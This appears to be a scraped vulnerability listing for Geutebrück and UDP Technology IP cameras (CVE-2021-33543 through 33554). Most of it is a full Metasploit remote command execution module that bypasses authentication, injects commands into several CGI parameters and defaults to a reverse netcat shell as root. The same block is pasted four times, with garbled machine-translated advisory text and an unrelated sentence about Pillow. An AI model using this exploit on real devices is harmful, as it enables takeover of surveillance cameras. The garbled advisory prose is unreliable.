Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 ‥ * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. * Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543 ‥ * Arbitrary code executed by command injection by a remote third party - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * By a remote third party counter Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33545 ‥ * By a remote third party name Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33546 ‥ * By a remote third party profile Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33547 ‥ * By a remote third party action Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33549. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Geutebruck Multiple Remote Command Execution', 'Description' => %q{ This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder and exploits multiple authenticated arbitrary command execution vulnerabilities within the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as the root user. }, 'Author' => [ 'Titouan Lazard', # Of RandoriSec - Discovery 'Ibrahim Ayadhi', # Of RandoriSec - Discovery and Metasploit Module 'Sébastien Charbonnier' # Of RandoriSec - Metasploit Module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2021-33543'], ['CVE', '2021-33544'], ['CVE', '2021-33548'], ['CVE', '2021-33550'], ['CVE', '2021-33551'], ['CVE', '2021-33552'], ['CVE', '2021-33553'], ['CVE', '2021-33554'], [ 'URL', 'http://geutebruck.com' ], [ 'URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'], [ 'URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03'] ], 'DisclosureDate' => '2021-07-08', 'Privileged' => true, 'Platform' => ['unix', 'linux'], 'Arch' => [ARCH_CMD], 'Targets' => [ [ 'CVE-2021-33544 - certmngr.cgi', { 'http_method' => 'GET', 'http_vars' => { 'action' => 'createselfcert', 'local' => Rex::Text.rand_text_alphanumeric(10..16), 'country' => Rex::Text.rand_text_alphanumeric(2), 'state' => '$(PLACEHOLDER_CMD)', 'organization' => Rex::Text.rand_text_alphanumeric(10..16), 'organizationunit' => Rex::Text.rand_text_alphanumeric(10..16), 'commonname' => Rex::Text.rand_text_alphanumeric(10..16), 'days' => Rex::Text.rand_text_numeric(2..4), 'type' => Rex::Text.rand_text_numeric(2..4) }, 'uri' => '/../uapi-cgi/certmngr.cgi' } ], [ 'CVE-2021-33548 - factory.cgi', { 'http_method' => 'GET', 'http_vars' => { 'preserve' => '$(PLACEHOLDER_CMD)' }, 'uri' => '/../uapi-cgi/factory.cgi' } ], [ 'CVE-2021-33550 - language.cgi', { 'http_method' => 'GET', 'http_vars' => { 'date' => '$(PLACEHOLDER_CMD)' }, 'uri' => '/../uapi-cgi/language.cgi' } ], [ 'CVE-2021-33551 - oem.cgi', { 'http_method' => 'GET', 'http_vars' => { 'action' => 'set', 'enable' => 'yes', 'environment.lang' => '$(PLACEHOLDER_CMD)' }, 'uri' => '/../uapi-cgi/oem.cgi' } ], [ 'CVE-2021-33552 - simple_reclistjs.cgi', { 'http_method' => 'GET', 'http_vars' => { 'action' => 'get', 'timekey' => Rex::Text.rand_text_numeric(2..4), 'date' => '$(PLACEHOLDER_CMD)' }, 'uri' => '/../uapi-cgi/simple_reclistjs.cgi' } ], [ 'CVE-2021-33553 - testcmd.cgi', { 'http_method' => 'GET', 'http_vars' => { 'command' => 'PLACEHOLDER_CMD' }, 'uri' => '/../uapi-cgi/testcmd.cgi' } ], [ 'CVE-2021-33554 - tmpapp.cgi', { 'http_method' => 'GET', 'http_vars' => { 'appfile.filename' => '$(PLACEHOLDER_CMD)' }, 'uri' => '/../uapi-cgi/tmpapp.cgi' } ] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping' }, 'Notes' => { 'Stability' => ['CRASH_SAFE'], 'Reliability' => ['REPEATABLE_SESSION'], 'SideEffects' => ['ARTIFACTS_ON_DISK'] } ) ) end def firmware res = send_request_cgi( 'method' => 'GET', 'uri' => '/brand.xml' ) unless res print_error('Connection failed!') return false end unless res&.body && !res.body.empty? print_error('Empty body in the response!') return false end res_xml = res.get_xml_document if res_xml.at('//firmware').nil? print_error('Target did not respond with a XML document containing the "firmware" element!') return false end raw_text = res_xml.at('//firmware').text if raw_text && raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/) raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)[0] else print_error('Target responded with a XML document containing the "firmware" element but its not a valid version string!') false end end def check version = firmware if version == false return CheckCode::Unknown('Target did not respond with a valid XML response that we could retrieve the version from!') end rex_version = Rex::Version.new(version) vprint_status("Found Geutebruck version #{rex_version}") if rex_version <= Rex::Version.new('1.12.0.27') || rex_version == Rex::Version.new('1.12.13.2') || rex_version == Rex::Version.new('1.12.14.5') return CheckCode::Appears end CheckCode::Safe end def exploit print_status("#{rhost}:#{rport} - Setting up request...") method = target['http_method'] if method == 'GET' http_method_vars = 'vars_get' else http_method_vars = 'vars_post' end http_vars = target['http_vars'] http_vars.each do |(k, v)| if v.include? 'PLACEHOLDER_CMD' http_vars[k]['PLACEHOLDER_CMD'] = payload.encoded end end print_status("Sending CMD injection request to #{rhost}:#{rport}") send_request_cgi( { 'method' => method, 'uri' => target['uri'], http_method_vars => http_vars } ) print_status('Exploit complete, you should get a shell as the root user!') end end

Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to a stack-based buffer overflow condition in the action parameter, which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 ‥ * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements

Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 ‥ * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. * Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543 ‥ * Arbitrary code executed by command injection by a remote third party - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * By a remote third party counter Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33545 ‥ * By a remote third party name Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33546 ‥ * By a remote third party profile Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33547 ‥ * By a remote third party action Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33549. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Geutebruck Multiple Remote Command Execution', 'Description' => %q{ This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder and exploits multiple authenticated arbitrary command execution vulnerabilities within the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as the root user. }, 'Author' => [ 'Titouan Lazard', # Of RandoriSec - Discovery 'Ibrahim Ayadhi', # Of RandoriSec - Discovery and Metasploit Module 'Sébastien Charbonnier' # Of RandoriSec - Metasploit Module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2021-33543'], ['CVE', '2021-33544'], ['CVE', '2021-33548'], ['CVE', '2021-33550'], ['CVE', '2021-33551'], ['CVE', '2021-33552'], ['CVE', '2021-33553'], ['CVE', '2021-33554'], [ 'URL', 'http://geutebruck.com' ], [ 'URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'], [ 'URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03'] ], 'DisclosureDate' => '2021-07-08', 'Privileged' => true, 'Platform' => ['unix', 'linux'], 'Arch' => [ARCH_CMD], 'Targets' => [ [ 'CVE-2021-33544 - certmngr.cgi', { 'http_method' => 'GET', 'http_vars' => { 'action' => 'createselfcert', 'local' => Rex::Text.rand_text_alphanumeric(10..16), 'country' => Rex::Text.rand_text_alphanumeric(2), 'state' => '$(PLACEHOLDER_CMD)', 'organization' => Rex::Text.rand_text_alphanumeric(10..16), 'organizationunit' => Rex::Text.rand_text_alphanumeric(10..16), 'commonname' => Rex::Text.rand_text_alphanumeric(10..16), 'days' => Rex::Text.rand_text_numeric(2..4), 'type' => Rex::Text.rand_text_numeric(2..4) }, 'uri' => '/../uapi-cgi/certmngr.cgi' } ], [ 'CVE-2021-33548 - factory.cgi', { 'http_method' => 'GET', 'http_vars' => { 'preserve' => '$(PLACEHOLDER_CMD)' }, 'uri' => '/../uapi-cgi/factory.cgi' } ], [ 'CVE-2021-33550 - language.cgi', { 'http_method' => 'GET', 'http_vars' => { 'date' => '$(PLACEHOLDER_CMD)' }, 'uri' => '/../uapi-cgi/language.cgi' } ], [ 'CVE-2021-33551 - oem.cgi', { 'http_method' => 'GET', 'http_vars' => { 'action' => 'set', 'enable' => 'yes', 'environment.lang' => '$(PLACEHOLDER_CMD)' }, 'uri' => '/../uapi-cgi/oem.cgi' } ], [ 'CVE-2021-33552 - simple_reclistjs.cgi', { 'http_method' => 'GET', 'http_vars' => { 'action' => 'get', 'timekey' => Rex::Text.rand_text_numeric(2..4), 'date' => '$(PLACEHOLDER_CMD)' }, 'uri' => '/../uapi-cgi/simple_reclistjs.cgi' } ], [ 'CVE-2021-33553 - testcmd.cgi', { 'http_method' => 'GET', 'http_vars' => { 'command' => 'PLACEHOLDER_CMD' }, 'uri' => '/../uapi-cgi/testcmd.cgi' } ], [ 'CVE-2021-33554 - tmpapp.cgi', { 'http_method' => 'GET', 'http_vars' => { 'appfile.filename' => '$(PLACEHOLDER_CMD)' }, 'uri' => '/../uapi-cgi/tmpapp.cgi' } ] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping' }, 'Notes' => { 'Stability' => ['CRASH_SAFE'], 'Reliability' => ['REPEATABLE_SESSION'], 'SideEffects' => ['ARTIFACTS_ON_DISK'] } ) ) end def firmware res = send_request_cgi( 'method' => 'GET', 'uri' => '/brand.xml' ) unless res print_error('Connection failed!') return false end unless res&.body && !res.body.empty? print_error('Empty body in the response!') return false end res_xml = res.get_xml_document if res_xml.at('//firmware').nil? print_error('Target did not respond with a XML document containing the "firmware" element!') return false end raw_text = res_xml.at('//firmware').text if raw_text && raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/) raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)[0] else print_error('Target responded with a XML document containing the "firmware" element but its not a valid version string!') false end end def check version = firmware if version == false return CheckCode::Unknown('Target did not respond with a valid XML response that we could retrieve the version from!') end rex_version = Rex::Version.new(version) vprint_status("Found Geutebruck version #{rex_version}") if rex_version <= Rex::Version.new('1.12.0.27') || rex_version == Rex::Version.new('1.12.13.2') || rex_version == Rex::Version.new('1.12.14.5') return CheckCode::Appears end CheckCode::Safe end def exploit print_status("#{rhost}:#{rport} - Setting up request...") method = target['http_method'] if method == 'GET' http_method_vars = 'vars_get' else http_method_vars = 'vars_post' end http_vars = target['http_vars'] http_vars.each do |(k, v)| if v.include? 'PLACEHOLDER_CMD' http_vars[k]['PLACEHOLDER_CMD'] = payload.encoded end end print_status("Sending CMD injection request to #{rhost}:#{rport}") send_request_cgi( { 'method' => method, 'uri' => target['uri'], http_method_vars => http_vars } ) print_status('Exploit complete, you should get a shell as the root user!') end end

Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 ‥ * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. * Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543 ‥ * Arbitrary code executed by command injection by a remote third party - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * By a remote third party counter Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33545 ‥ * By a remote third party name Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33546 ‥ * By a remote third party profile Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33547 ‥ * By a remote third party action Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33549. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Geutebruck Multiple Remote Command Execution', 'Description' => %q{ This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder and exploits multiple authenticated arbitrary command execution vulnerabilities within the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as the root user. }, 'Author' => [ 'Titouan Lazard', # Of RandoriSec - Discovery 'Ibrahim Ayadhi', # Of RandoriSec - Discovery and Metasploit Module 'Sébastien Charbonnier' # Of RandoriSec - Metasploit Module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2021-33543'], ['CVE', '2021-33544'], ['CVE', '2021-33548'], ['CVE', '2021-33550'], ['CVE', '2021-33551'], ['CVE', '2021-33552'], ['CVE', '2021-33553'], ['CVE', '2021-33554'], [ 'URL', 'http://geutebruck.com' ], [ 'URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'], [ 'URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03'] ], 'DisclosureDate' => '2021-07-08', 'Privileged' => true, 'Platform' => ['unix', 'linux'], 'Arch' => [ARCH_CMD], 'Targets' => [ [ 'CVE-2021-33544 - certmngr.cgi', { 'http_method' => 'GET', 'http_vars' => { 'action' => 'createselfcert', 'local' => Rex::Text.rand_text_alphanumeric(10..16), 'country' => Rex::Text.rand_text_alphanumeric(2), 'state' => '$(PLACEHOLDER_CMD)', 'organization' => Rex::Text.rand_text_alphanumeric(10..16), 'organizationunit' => Rex::Text.rand_text_alphanumeric(10..16), 'commonname' => Rex::Text.rand_text_alphanumeric(10..16), 'days' => Rex::Text.rand_text_numeric(2..4), 'type' => Rex::Text.rand_text_numeric(2..4) }, 'uri' => '/../uapi-cgi/certmngr.cgi' } ], [ 'CVE-2021-33548 - factory.cgi', { 'http_method' => 'GET', 'http_vars' => { 'preserve' => '$(PLACEHOLDER_CMD)' }, 'uri' => '/../uapi-cgi/factory.cgi' } ], [ 'CVE-2021-33550 - language.cgi', { 'http_method' => 'GET', 'http_vars' => { 'date' => '$(PLACEHOLDER_CMD)' }, 'uri' => '/../uapi-cgi/language.cgi' } ], [ 'CVE-2021-33551 - oem.cgi', { 'http_method' => 'GET', 'http_vars' => { 'action' => 'set', 'enable' => 'yes', 'environment.lang' => '$(PLACEHOLDER_CMD)' }, 'uri' => '/../uapi-cgi/oem.cgi' } ], [ 'CVE-2021-33552 - simple_reclistjs.cgi', { 'http_method' => 'GET', 'http_vars' => { 'action' => 'get', 'timekey' => Rex::Text.rand_text_numeric(2..4), 'date' => '$(PLACEHOLDER_CMD)' }, 'uri' => '/../uapi-cgi/simple_reclistjs.cgi' } ], [ 'CVE-2021-33553 - testcmd.cgi', { 'http_method' => 'GET', 'http_vars' => { 'command' => 'PLACEHOLDER_CMD' }, 'uri' => '/../uapi-cgi/testcmd.cgi' } ], [ 'CVE-2021-33554 - tmpapp.cgi', { 'http_method' => 'GET', 'http_vars' => { 'appfile.filename' => '$(PLACEHOLDER_CMD)' }, 'uri' => '/../uapi-cgi/tmpapp.cgi' } ] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping' }, 'Notes' => { 'Stability' => ['CRASH_SAFE'], 'Reliability' => ['REPEATABLE_SESSION'], 'SideEffects' => ['ARTIFACTS_ON_DISK'] } ) ) end def firmware res = send_request_cgi( 'method' => 'GET', 'uri' => '/brand.xml' ) unless res print_error('Connection failed!') return false end unless res&.body && !res.body.empty? print_error('Empty body in the response!') return false end res_xml = res.get_xml_document if res_xml.at('//firmware').nil? print_error('Target did not respond with a XML document containing the "firmware" element!') return false end raw_text = res_xml.at('//firmware').text if raw_text && raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/) raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)[0] else print_error('Target responded with a XML document containing the "firmware" element but its not a valid version string!') false end end def check version = firmware if version == false return CheckCode::Unknown('Target did not respond with a valid XML response that we could retrieve the version from!') end rex_version = Rex::Version.new(version) vprint_status("Found Geutebruck version #{rex_version}") if rex_version <= Rex::Version.new('1.12.0.27') || rex_version == Rex::Version.new('1.12.13.2') || rex_version == Rex::Version.new('1.12.14.5') return CheckCode::Appears end CheckCode::Safe end def exploit print_status("#{rhost}:#{rport} - Setting up request...") method = target['http_method'] if method == 'GET' http_method_vars = 'vars_get' else http_method_vars = 'vars_post' end http_vars = target['http_vars'] http_vars.each do |(k, v)| if v.include? 'PLACEHOLDER_CMD' http_vars[k]['PLACEHOLDER_CMD'] = payload.encoded end end print_status("Sending CMD injection request to #{rhost}:#{rport}") send_request_cgi( { 'method' => method, 'uri' => target['uri'], http_method_vars => http_vars } ) print_status('Exploit complete, you should get a shell as the root user!') end end

Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 ‥ * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. * Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543 ‥ * Arbitrary code executed by command injection by a remote third party - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * By a remote third party counter Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33545 ‥ * By a remote third party name Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33546 ‥ * By a remote third party profile Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33547 ‥ * By a remote third party action Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33549. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Geutebruck Multiple Remote Command Execution', 'Description' => %q{ This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder and exploits multiple authenticated arbitrary command execution vulnerabilities within the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as the root user. }, 'Author' => [ 'Titouan Lazard', # Of RandoriSec - Discovery 'Ibrahim Ayadhi', # Of RandoriSec - Discovery and Metasploit Module 'Sébastien Charbonnier' # Of RandoriSec - Metasploit Module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2021-33543'], ['CVE', '2021-33544'], ['CVE', '2021-33548'], ['CVE', '2021-33550'], ['CVE', '2021-33551'], ['CVE', '2021-33552'], ['CVE', '2021-33553'], ['CVE', '2021-33554'], [ 'URL', 'http://geutebruck.com' ], [ 'URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'], [ 'URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03'] ], 'DisclosureDate' => '2021-07-08', 'Privileged' => true, 'Platform' => ['unix', 'linux'], 'Arch' => [ARCH_CMD], 'Targets' => [ [ 'CVE-2021-33544 - certmngr.cgi', { 'http_method' => 'GET', 'http_vars' => { 'action' => 'createselfcert', 'local' => Rex::Text.rand_text_alphanumeric(10..16), 'country' => Rex::Text.rand_text_alphanumeric(2), 'state' => '$(PLACEHOLDER_CMD)', 'organization' => Rex::Text.rand_text_alphanumeric(10..16), 'organizationunit' => Rex::Text.rand_text_alphanumeric(10..16), 'commonname' => Rex::Text.rand_text_alphanumeric(10..16), 'days' => Rex::Text.rand_text_numeric(2..4), 'type' => Rex::Text.rand_text_numeric(2..4) }, 'uri' => '/../uapi-cgi/certmngr.cgi' } ], [ 'CVE-2021-33548 - factory.cgi', { 'http_method' => 'GET', 'http_vars' => { 'preserve' => '$(PLACEHOLDER_CMD)' }, 'uri' => '/../uapi-cgi/factory.cgi' } ], [ 'CVE-2021-33550 - language.cgi', { 'http_method' => 'GET', 'http_vars' => { 'date' => '$(PLACEHOLDER_CMD)' }, 'uri' => '/../uapi-cgi/language.cgi' } ], [ 'CVE-2021-33551 - oem.cgi', { 'http_method' => 'GET', 'http_vars' => { 'action' => 'set', 'enable' => 'yes', 'environment.lang' => '$(PLACEHOLDER_CMD)' }, 'uri' => '/../uapi-cgi/oem.cgi' } ], [ 'CVE-2021-33552 - simple_reclistjs.cgi', { 'http_method' => 'GET', 'http_vars' => { 'action' => 'get', 'timekey' => Rex::Text.rand_text_numeric(2..4), 'date' => '$(PLACEHOLDER_CMD)' }, 'uri' => '/../uapi-cgi/simple_reclistjs.cgi' } ], [ 'CVE-2021-33553 - testcmd.cgi', { 'http_method' => 'GET', 'http_vars' => { 'command' => 'PLACEHOLDER_CMD' }, 'uri' => '/../uapi-cgi/testcmd.cgi' } ], [ 'CVE-2021-33554 - tmpapp.cgi', { 'http_method' => 'GET', 'http_vars' => { 'appfile.filename' => '$(PLACEHOLDER_CMD)' }, 'uri' => '/../uapi-cgi/tmpapp.cgi' } ] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping' }, 'Notes' => { 'Stability' => ['CRASH_SAFE'], 'Reliability' => ['REPEATABLE_SESSION'], 'SideEffects' => ['ARTIFACTS_ON_DISK'] } ) ) end def firmware res = send_request_cgi( 'method' => 'GET', 'uri' => '/brand.xml' ) unless res print_error('Connection failed!') return false end unless res&.body && !res.body.empty? print_error('Empty body in the response!') return false end res_xml = res.get_xml_document if res_xml.at('//firmware').nil? print_error('Target did not respond with a XML document containing the "firmware" element!') return false end raw_text = res_xml.at('//firmware').text if raw_text && raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/) raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)[0] else print_error('Target responded with a XML document containing the "firmware" element but its not a valid version string!') false end end def check version = firmware if version == false return CheckCode::Unknown('Target did not respond with a valid XML response that we could retrieve the version from!') end rex_version = Rex::Version.new(version) vprint_status("Found Geutebruck version #{rex_version}") if rex_version <= Rex::Version.new('1.12.0.27') || rex_version == Rex::Version.new('1.12.13.2') || rex_version == Rex::Version.new('1.12.14.5') return CheckCode::Appears end CheckCode::Safe end def exploit print_status("#{rhost}:#{rport} - Setting up request...") method = target['http_method'] if method == 'GET' http_method_vars = 'vars_get' else http_method_vars = 'vars_post' end http_vars = target['http_vars'] http_vars.each do |(k, v)| if v.include? 'PLACEHOLDER_CMD' http_vars[k]['PLACEHOLDER_CMD'] = payload.encoded end end print_status("Sending CMD injection request to #{rhost}:#{rport}") send_request_cgi( { 'method' => method, 'uri' => target['uri'], http_method_vars => http_vars } ) print_status('Exploit complete, you should get a shell as the root user!') end end